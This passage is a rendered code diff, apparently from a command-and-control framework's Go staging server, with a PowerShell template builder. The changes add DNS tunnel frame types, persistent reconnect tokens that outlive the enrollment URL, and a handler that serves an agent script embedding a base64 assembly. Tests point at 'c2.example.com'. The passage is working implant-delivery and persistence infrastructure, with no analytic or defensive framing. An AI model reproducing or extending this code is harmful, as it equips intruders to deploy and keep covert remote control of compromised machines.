}
}
func TestSingleListenerAcceptReturnsEOFAfterFirstConn(t *testing.T) {
c1, c2 := net.Pipe()
defer c1.Close()
defer c2.Close()
ln := &singleListener{conn: c1, done: make(chan struct{})}
got, err := ln.Accept()
if err != nil {
t.Fatalf("first accept failed: %v", err)
}
if got != c1 {
t.Fatal("first accept returned unexpected connection")
}
if _, err := ln.Accept(); err == nil {
t.Fatal("second accept should return EOF")
}
}
+2
View File
@@ -16,6 +16,8 @@ const (
FrameClose byte = 5 FrameClose byte = 5
FramePing byte = 6 FramePing byte = 6
FramePong byte = 7 FramePong byte = 7
FrameDNSQuery byte = 8
FrameDNSReply byte = 9
MaxPayload = 1 << 20 MaxPayload = 1 << 20
) )
+41 -25
View File
@@ -11,25 +11,28 @@ import (
) )
type Session struct { type Session struct {
ID string ID string
Server string Server string
Port int Port int
CertPin string CertPin string
EnrollToken string EnrollToken string
ExpiresAt time.Time ReconnectToken string
Delivered bool DNSTarget string
Enrolled bool ExpiresAt time.Time
Delivered bool
Enrolled bool
} }
type Store struct { type Store struct {
mu sync.Mutex mu sync.Mutex
sessions map[string]*Session sessions map[string]*Session
tokens map[string]*Session tokens map[string]*Session
ttl time.Duration reconnects map[string]*Session
ttl time.Duration
} }
func NewStore(ttl time.Duration) *Store { func NewStore(ttl time.Duration) *Store {
return &Store{sessions: map[string]*Session{}, tokens: map[string]*Session{}, ttl: ttl} return &Store{sessions: map[string]*Session{}, tokens: map[string]*Session{}, reconnects: map[string]*Session{}, ttl: ttl}
} }
func NewSecret(n int) (string, error) { func NewSecret(n int) (string, error) {
@@ -40,7 +43,7 @@ func NewSecret(n int) (string, error) {
return base64.RawURLEncoding.EncodeToString(b), nil return base64.RawURLEncoding.EncodeToString(b), nil
} }
func (s *Store) Create(server string, port int, certPin string) (*Session, error) { func (s *Store) Create(server string, port int, certPin, dnsTarget string) (*Session, error) {
id, err := NewSecret(18) id, err := NewSecret(18)
if err != nil { if err != nil {
return nil, err return nil, err
@@ -49,11 +52,16 @@ func (s *Store) Create(server string, port int, certPin string) (*Session, error
if err != nil { if err != nil {
return nil, err return nil, err
} }
sess := &Session{ID: id, Server: server, Port: port, CertPin: certPin, EnrollToken: tok, ExpiresAt: time.Now().Add(s.ttl)} reconnect, err := NewSecret(32)
if err != nil {
return nil, err
}
sess := &Session{ID: id, Server: server, Port: port, CertPin: certPin, EnrollToken: tok, ReconnectToken: reconnect, DNSTarget: dnsTarget, ExpiresAt: time.Now().Add(s.ttl)}
s.mu.Lock() s.mu.Lock()
defer s.mu.Unlock() defer s.mu.Unlock()
s.sessions[id] = sess s.sessions[id] = sess
s.tokens[tok] = sess s.tokens[tok] = sess
s.reconnects[reconnect] = sess
return sess, nil return sess, nil
} }
@@ -67,6 +75,7 @@ func (s *Store) RedeemScript(id string) (*Session, error) {
if time.Now().After(sess.ExpiresAt) { if time.Now().After(sess.ExpiresAt) {
delete(s.sessions, id) delete(s.sessions, id)
delete(s.tokens, sess.EnrollToken) delete(s.tokens, sess.EnrollToken)
delete(s.reconnects, sess.ReconnectToken)
return nil, errors.New("enrollment expired") return nil, errors.New("enrollment expired")
} }
if sess.Delivered { if sess.Delivered {
@@ -76,19 +85,24 @@ func (s *Store) RedeemScript(id string) (*Session, error) {
return sess, nil return sess, nil
} }
func (s *Store) Enroll(token string) error { func (s *Store) Authenticate(enrollToken, reconnectToken string) error {
s.mu.Lock() s.mu.Lock()
defer s.mu.Unlock() defer s.mu.Unlock()
sess := s.tokens[token] sess := s.reconnects[reconnectToken]
if sess != nil && sess.Enrolled {
return nil
}
sess = s.tokens[enrollToken]
if sess == nil { if sess == nil {
return errors.New("invalid enrollment token") return errors.New("invalid enrollment token")
} }
if time.Now().After(sess.ExpiresAt) { if time.Now().After(sess.ExpiresAt) {
delete(s.sessions, sess.ID) delete(s.sessions, sess.ID)
delete(s.tokens, token) delete(s.tokens, enrollToken)
delete(s.reconnects, sess.ReconnectToken)
return errors.New("enrollment expired") return errors.New("enrollment expired")
} }
if sess.Enrolled { if sess.Enrolled && sess.ReconnectToken != reconnectToken {
return errors.New("enrollment token already used") return errors.New("enrollment token already used")
} }
sess.Enrolled = true sess.Enrolled = true
@@ -96,11 +110,13 @@ func (s *Store) Enroll(token string) error {
} }
type AgentTemplateData struct { type AgentTemplateData struct {
AssemblyB64 string AssemblyB64 string
Server string Server string
Port int Port int
CertPin string CertPin string
EnrollToken string EnrollToken string
ReconnectToken string
DNSTarget string
} }
func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) http.HandlerFunc { func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) http.HandlerFunc {
@@ -113,6 +129,6 @@ func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) htt
} }
w.Header().Set("Content-Type", "text/plain; charset=utf-8") w.Header().Set("Content-Type", "text/plain; charset=utf-8")
w.Header().Set("Cache-Control", "no-store") w.Header().Set("Cache-Control", "no-store")
_ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, CertPin: sess.CertPin, EnrollToken: sess.EnrollToken}) _ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, CertPin: sess.CertPin, EnrollToken: sess.EnrollToken, ReconnectToken: sess.ReconnectToken, DNSTarget: sess.DNSTarget})
} }
} }
+49
View File
@@ -0,0 +1,49 @@
package staging
import (
"testing"
"time"
)
func TestAuthenticateAllowsReconnectTokenAfterEnrollment(t *testing.T) {
store := NewStore(time.Minute)
sess, err := store.Create("c2.example.com", 443, "pin", "10.0.0.10:53")
if err != nil {
t.Fatalf("create session: %v", err)
}
if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil {
t.Fatalf("initial enrollment failed: %v", err)
}
if err := store.Authenticate("", sess.ReconnectToken); err != nil {
t.Fatalf("reconnect failed: %v", err)
}
}
func TestAuthenticateRejectsReusedEnrollTokenWithoutReconnectToken(t *testing.T) {
store := NewStore(time.Minute)
sess, err := store.Create("c2.example.com", 443, "pin", "")
if err != nil {
t.Fatalf("create session: %v", err)
}
if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil {
t.Fatalf("initial enrollment failed: %v", err)
}
if err := store.Authenticate(sess.EnrollToken, "wrong"); err == nil {
t.Fatal("reused enrollment token without reconnect token should fail")
}
}
func TestReconnectTokenSurvivesEnrollmentURLTTL(t *testing.T) {
store := NewStore(50 * time.Millisecond)
sess, err := store.Create("c2.example.com", 443, "pin", "")
if err != nil {
t.Fatalf("create session: %v", err)
}
if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil {
t.Fatalf("initial enrollment failed: %v", err)
}
time.Sleep(75 * time.Millisecond)
if err := store.Authenticate("", sess.ReconnectToken); err != nil {
t.Fatalf("reconnect token should survive URL TTL after enrollment: %v", err)
}
}
+2
View File
@@ -23,6 +23,8 @@ $template = $template.Replace('{{.Server}}', '__SERVER__')
$template = $template.Replace('{{.Port}}', '443') $template = $template.Replace('{{.Port}}', '443')
$template = $template.Replace('{{.CertPin}}', '__CERT_PIN__') $template = $template.Replace('{{.CertPin}}', '__CERT_PIN__')
$template = $template.Replace('{{.EnrollToken}}', '__ENROLL_TOKEN__') $template = $template.Replace('{{.EnrollToken}}', '__ENROLL_TOKEN__')
$template = $template.Replace('{{.ReconnectToken}}', '__RECONNECT_TOKEN__')
$template = $template.Replace('{{.DNSTarget}}', '__DNS_TARGET__')
[IO.File]::WriteAllText($OutFile, $template, [Text.Encoding]::UTF8) [IO.File]::WriteAllText($OutFile, $template, [Text.Encoding]::UTF8)
Write-Host "Wrote $OutFile" Write-Host "Wrote $OutFile"
Write-Host "Wrote $b64Out" Write-Host "Wrote $b64Out"